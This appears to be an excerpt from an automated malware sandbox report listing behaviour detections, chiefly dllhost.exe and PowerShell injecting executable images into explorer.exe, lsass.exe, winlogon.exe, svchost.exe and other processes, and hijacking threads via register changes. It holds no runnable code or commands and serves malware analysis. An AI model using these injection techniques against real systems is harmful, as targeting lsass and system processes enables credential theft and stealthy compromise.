Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: E90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1520000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 980000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 11A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 11C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 490000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 430000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: B10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 10F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1110000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 1280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\LhbeVWsISCNXUAPFjrGMwuuNQmsyBvMvrRaXjPRIPBhFvRfdKAnyNbrypGZ\tClCDfWzLPsyntkTFYJFn.exe base: 12A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B421F20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B421F50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24D756E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24D75710000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1F0C6720000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1F0C6750000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1EBD5460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1EBD5490000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B4448A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B4448D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B7B9BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B7B9BF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1A38DBE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1FE3A940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1A38DC10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1FE3BA50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1B6C0940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1B6C0990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 18FE8A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 2C9A6100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 2C9A6150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2E0D9CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2E0F4010000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 250A4740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 250A4AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1F1ACC50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1F1ACD70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\cmd.exe base: 1F188E00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1DA71D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 25791060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1DA73E60000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dllhost.exe	Memory written: PID: 4084 base: 8260000 value: 4D
Source: C:\Windows\System32\dllhost.exe	Memory written: PID: 4084 base: 8260000 value: 4D

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 7624	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 2080
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 2384

Sets debug register (to hijack the execution of another thread)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread register set: 7624 1

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 8500000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 509BC5A010
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 2E991720000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 213BDCB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 158709A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 26DB1600000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 2E991720000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 213BDCB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 158709A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 26DB1630000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2917C380000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22382770000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2917C380000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1486AD40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1486AD70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24BD3CA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24BD3CD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FA73D30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD021B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 269B9FD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FA73D30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD021B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 269BA660000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22054D80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22055340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27C57DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 27C57DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A333B40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A333B70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F174530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23315740000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A9C8540000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EC212A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F174530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1876D540000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23315740000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22CD8950000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A9C8540000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15104330000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1EC212A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22308E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1876D540000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AB19360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22CD8950000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E731800000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15104330000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A6DD9B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 22308E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E2FA1C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AB19360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: D50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E731800000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 209D2560000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FC05190000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: D50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 209D2560000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D6B0FC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FC05190000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2036E550000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC5C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D6B0FC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2480FAC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2036E550000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2671A930000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C588F90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2480FAC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A8857C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2671A930000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 174DEDC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2C588F90000
